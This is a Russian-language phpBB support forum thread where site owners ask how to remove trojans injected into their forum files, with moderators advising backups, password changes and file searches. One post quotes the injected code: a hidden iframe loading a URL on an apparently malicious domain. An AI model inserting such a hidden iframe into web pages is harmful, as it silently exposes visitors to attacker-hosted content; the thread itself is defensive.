Пропустить

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Свернуть Развернуть Правила форума Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).

Как убить Трояна?

Сообщение AdmninsCluba » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

AdmninsCluba
phpBB 1.2.0
 
Сообщения: 17
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение владимир1983 » 01.12.2011 15:23

pavelkim писал(а):после его чистки

Поиск по файлам выполнял по известному вредоносному коду?
pavelkim писал(а):какие файлы посмотрет

Если
pavelkim писал(а):"Найти пользователя"

То смотри memberlist_search.html
И читай [FAQ] Шаблон форума, CSS и html, где что "ковырять"
Сдаюсь в аренду или временно поживу за счет заказчика
Аватара пользователя
владимир1983
Поддержка
Поддержка
 
Сообщения: 1823
Зарегистрирован: 27.04.2010 2:17
Откуда: Сергиев Посад
Благодарил (а): 70 раз.
Поблагодарили: 205 раз.

Re: Как убить Трояна?

Сообщение pavelkim » 01.12.2011 15:45

владимир1983 писал(а):Поиск по файлам выполнял по известному вредоносному коду?

еще при чистке форума. Это было около месяца назад. Сам код не сохранил.

Просмотр файла memberlist_search.html ничего не дал. Так же смотрел forum_fn.js - тоже ничего не нашел. Не могу приложить их к сообщению. В ответ: Закачка была отклонена, так как вложение было определено как возможная атака. Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?
Аватара пользователя
pavelkim
phpBB 1.4.4
 
Сообщения: 98
Зарегистрирован: 20.08.2009 22:40
Откуда: Беларусь
Благодарил (а): 6 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Sheer » 01.12.2011 17:12

pavelkim писал(а): Означает ли это, что я что-то пропустил и в файлах действительно есть вредоносный код?

Естественно. При закачке какого файла?
Изображение
Аватара пользователя
Sheer
Поддержка
Поддержка
 
Сообщения: 1536
Зарегистрирован: 18.11.2009 1:40
Откуда: Рига, Латвия (нелепая страна)
Благодарил (а): 9 раз.
Поблагодарили: 289 раз.

Re: Как убить Трояна?

Сообщение pavelkim » 01.12.2011 17:59

Пробовал и .html и .txt
Каждый раз присутствовала угроза атаки при закачке.

Добавлено спустя 9 минут 44 секунды:
! Нашел трояна в следующих файлах:
simple_footer.html и simple_header.html
Аватара пользователя
pavelkim
phpBB 1.4.4
 
Сообщения: 98
Зарегистрирован: 20.08.2009 22:40
Откуда: Беларусь
Благодарил (а): 6 раз.
Поблагодарили: 0 раз.

Javascript вирус

Сообщение TheRain » 29.02.2012 2:36

Здравствуйте.
Захожу сегодня на форум к себе и вижу что nod ругается. Кинулся разбираться. В итоге оказалось что каким-то образом оказались заражены вирусом(?) .js файлы.
Firebug показал вот такой кусок кода на страницах:
<div style="z-index: -10000; visibility: hidden; position: absolute; width: 50px; height: 50px;">
<iframe width="50" scrolling="no" height="50" frameborder="0" src="http://activatedreplacing.is-very-evil.org/index.php?28d9000e56c2a63080ff89c6f5357591">
</div> 

Подробнее об этом и о мерах лечения здесь.
Мне помогло.
Если тебе нечего делать, делай это не здесь...

TheRain
phpBB 1.4.2
 
Сообщения: 53
Зарегистрирован: 05.10.2005 17:06
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение lucifer » 06.03.2012 22:58

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?
Сразу после таковой смены почтового адреса на форум попал троян (если верить avast`у).
Доступ к серверу не имею. Есть возможность удалить трояна через интернет?
Аватара пользователя
lucifer
phpBB 1.4.0
 
Сообщения: 35
Зарегистрирован: 05.10.2011 9:59
Благодарил (а): 3 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Sheer » 06.03.2012 23:12

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

Вранье.
lucifer писал(а):А смена почтового адреса форума с forum@***.ru на обычный gmail`овский может стать брешью в защите форума?

Нет.
lucifer писал(а):Доступ к серверу не имею. Есть возможность удалить трояна через интернет?

Нет.
Изображение
Аватара пользователя
Sheer
Поддержка
Поддержка
 
Сообщения: 1536
Зарегистрирован: 18.11.2009 1:40
Откуда: Рига, Латвия (нелепая страна)
Благодарил (а): 9 раз.
Поблагодарили: 289 раз.

Re: Как убить Трояна?

Сообщение владимир1983 » 06.03.2012 23:13

AdmninsCluba писал(а):Хостер сказал

Пускай укажет на уязвимость.
В phpbb нет известных уязвимостей!
Сдаюсь в аренду или временно поживу за счет заказчика
Аватара пользователя
владимир1983
Поддержка
Поддержка
 
Сообщения: 1823
Зарегистрирован: 27.04.2010 2:17
Откуда: Сергиев Посад
Благодарил (а): 70 раз.
Поблагодарили: 205 раз.

Re: Как убить Трояна?

Сообщение lucifer » 06.03.2012 23:19

Зайдя на форум обнаружил там:
Изображение

При этом загрузка страницы прекратилась, так как Avast! распознал трояна.

Последние действия:
- смена админского почтового адреса
- отправка письма пользователю через массовую рассылку
- активация пользователей
- чистка кеша.

Версия phpBB: 3.0.7-PL1
Стиль prosilver
Заходил через другой браузер, картина таже.

Как это устранить? Форум является частью сайта. Необходимо просканировать сайт вместе с форумом на вирусы?
Аватара пользователя
lucifer
phpBB 1.4.0
 
Сообщения: 35
Зарегистрирован: 05.10.2011 9:59
Благодарил (а): 3 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение владимир1983 » 06.03.2012 23:23

lucifer писал(а):Как это устранить?

Прочитать эту тему.
Используя FTP клиент найти вредоносный код и удалить его.
Сдаюсь в аренду или временно поживу за счет заказчика
Аватара пользователя
владимир1983
Поддержка
Поддержка
 
Сообщения: 1823
Зарегистрирован: 27.04.2010 2:17
Откуда: Сергиев Посад
Благодарил (а): 70 раз.
Поблагодарили: 205 раз.

Re: Как убить Трояна?

Сообщение Sheer » 06.03.2012 23:23

lucifer писал(а):Необходимо просканировать сайт вместе с форумом на вирусы?

Просканируйте. Только как вы это сделаете, если
lucifer писал(а):Доступ к серверу не имею
Изображение
Аватара пользователя
Sheer
Поддержка
Поддержка
 
Сообщения: 1536
Зарегистрирован: 18.11.2009 1:40
Откуда: Рига, Латвия (нелепая страна)
Благодарил (а): 9 раз.
Поблагодарили: 289 раз.

Re: Как убить Трояна?

Сообщение lucifer » 06.03.2012 23:35

Sheer
Сканирование сайта и форума поможет обнаружить и обезвредить трояна?

владимир1983 писал(а):найти вредоносный код и удалить его.

А где он может засесть этот код? И откуда мог взяться?
Аватара пользователя
lucifer
phpBB 1.4.0
 
Сообщения: 35
Зарегистрирован: 05.10.2011 9:59
Благодарил (а): 3 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Garret_Dark » 07.03.2012 0:00

lucifer писал(а):где он может засесть этот код?

Искать последние измененные файлы по дате. А в них искать код который видете на странице (Код трояна), меняете зараженные файлы на файлы из бэкапа (Если не сможете корректно удалить вредоносный код) или вообще все файлы восстанавливаете из бэкапа.
Ищите шелл - "левый" файл, опять таки файл по дате создания

lucifer писал(а):откуда мог взяться?

Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.
Аватара пользователя
Garret_Dark
phpBB 2.0.21
 
Сообщения: 749
Зарегистрирован: 11.01.2009 16:18
Благодарил (а): 91 раз.
Поблагодарили: 77 раз.

Re: Как убить Трояна?

Сообщение lucifer » 07.03.2012 0:07

Garret_Dark писал(а):Обновитесь, поменяйте пароли на все, что хоть каким боком связано с форумом.

Я всё же связываю проникновение вируса со сменой почтового адреса форума, поскольку сразу после этого пришёл вирус. Либо после активации пользователей..
А что значит "обновиться" и можно ли это сделать не имея доступа к серверу?
Аватара пользователя
lucifer
phpBB 1.4.0
 
Сообщения: 35
Зарегистрирован: 05.10.2011 9:59
Благодарил (а): 3 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Garret_Dark » 07.03.2012 0:40

lucifer писал(а): не имея доступа к серверу?

Хмм... Пропустил этот момент.
Не имея доступа к серверу, через админку можно править только файлы шаблона...
Я считаю, что код, скорее всего, появился после очистки кэша (Причем тут почтовый адрес то? Это просто запись в БД) и в этом случае как раз таки код находится в шаблоне, но искать его придется ручками, скорее всего он в overall_header.html если вообще в шаблоне...
Аватара пользователя
Garret_Dark
phpBB 2.0.21
 
Сообщения: 749
Зарегистрирован: 11.01.2009 16:18
Благодарил (а): 91 раз.
Поблагодарили: 77 раз.

Пред.След.

Вернуться в phpBB-пространство

 

  • Похожие темы
    Ответы
    Просмотры
    Последнее сообщение

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0

Бессрочный конкурс phpBB-ориентированных материалов
FastVPS — надёжный и доступный хостинг для phpBB
Изображение